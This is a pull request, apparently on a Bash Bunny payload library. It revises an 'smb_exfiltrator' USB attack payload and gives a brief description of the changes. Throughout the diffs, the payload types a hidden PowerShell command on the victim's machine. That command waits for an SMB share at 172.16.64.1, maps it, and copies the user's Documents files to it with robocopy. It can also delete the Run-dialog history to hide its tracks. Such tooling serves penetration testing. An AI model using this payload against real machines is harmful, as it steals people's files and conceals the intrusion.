### PR TITLE
SMB_exfiltrator : PowerShell improvements

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -19,7 +19,7 @@
 #
 # OPTIONS
 LOOTDIR=/root/udisk/loot/smb_exfiltrator
-EXFILTRATE_FILES="*.pdf"
+FILES="*.pdf" # File types to be exfiltrated
 CLEARTRACKS="yes" # yes or no
 
 # Initialization
@@ -44,7 +44,7 @@ if [ $CLEARTRACKS == "yes" ]; then
    QUACK Delay 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 192.168.5.5,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
    QUACK ENTER
 fi
 
@@ -53,7 +53,7 @@ if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 192.168.5.5,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
    QUACK ENTER
 fi
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -32,11 +32,11 @@ if [ ! -d /pentest/impacket/ ]; then
 fi
 
 # Define powershell payload
-PAYLOAD="While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S"
+PAYLOAD="While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S"
 
 # If cleartracks add the code to the powershell payload
 if [ $CLEARTRACKS == "yes" ]; then
-  PAYLOAD="${PAYLOAD};rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+  PAYLOAD="${PAYLOAD};rp HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -N '*'"
 fi
 
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -44,7 +44,7 @@ if [ $CLEARTRACKS == "yes" ]; then
    QUACK Delay 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 172.16.64.1,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
    QUACK ENTER
 fi
 
@@ -53,7 +53,7 @@ if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 172.16.64.1,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
    QUACK ENTER
 fi
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -36,6 +36,7 @@ PAYLOAD="While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use
 
 # If cleartracks add the code to the powershell payload
 if [ $CLEARTRACKS == "yes" ]; then
+  PAYLOAD=${PAYLOAD%\"}
   PAYLOAD="${PAYLOAD};rp HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -N '*'"
 fi
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -44,7 +44,7 @@ if [ $CLEARTRACKS == "yes" ]; then
    QUACK Delay 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
    QUACK ENTER
 fi
 
@@ -53,7 +53,7 @@ if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient (172.16.64.1,445))){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
+   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S
    QUACK ENTER
 fi
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -44,7 +44,7 @@ if [ $CLEARTRACKS == "yes" ]; then
    QUACK Delay 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 192.168.5.5,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 172.16.64.1,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
    QUACK ENTER
 fi
 
@@ -53,7 +53,7 @@ if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 192.168.5.5,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
+   QUACK STRING PowerShell -W Hidden "While(!!(New-Object net.sockets.tcpclient -A 172.16.64.1,445)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $FILES /S
    QUACK ENTER
 fi
 

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -38,17 +38,22 @@ fi
 # Once found, initiates file copy and exits
 LED R G
 ATTACKMODE HID
-QUACK GUI r
-QUACK DELAY 500
-QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
-QUACK ENTER
 
-# Clear tracks?
+# Clear tracks = yes
 if [ $CLEARTRACKS == "yes" ]; then
+   QUACK Delay 500
+   QUACK GUI r
+   QUACK DELAY 500
+   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\;rp 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -N '*'"
+   QUACK ENTER
+fi
+
+# Clear tracks = no
+if [ $CLEARTRACKS == "no" ]; then
    QUACK DELAY 500
    QUACK GUI r
    QUACK DELAY 500
-   QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
+   QUACK STRING PowerShell -W Hidden \"While(!(TNC 172.16.64.1 SMB -I quiet)){};net use \\\172.16.64.1\e PWD /USER:USER;robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S
    QUACK ENTER
 fi
 


### PR DESCRIPTION
Apologies for making multiple pull requests (I have closed all previous ones now).  Didn't really understand what I was doing the first time.

Original pull request: https://github.com/hak5/bashbunny-payloads/pull/105

Changes made:
~~*PowerShell modules now require PSv4+ (Win8.1/Server 2012R2)~~
*Eliminated need for 2x 'GUI + R' commands
*Now using SMB checks rather than generic ping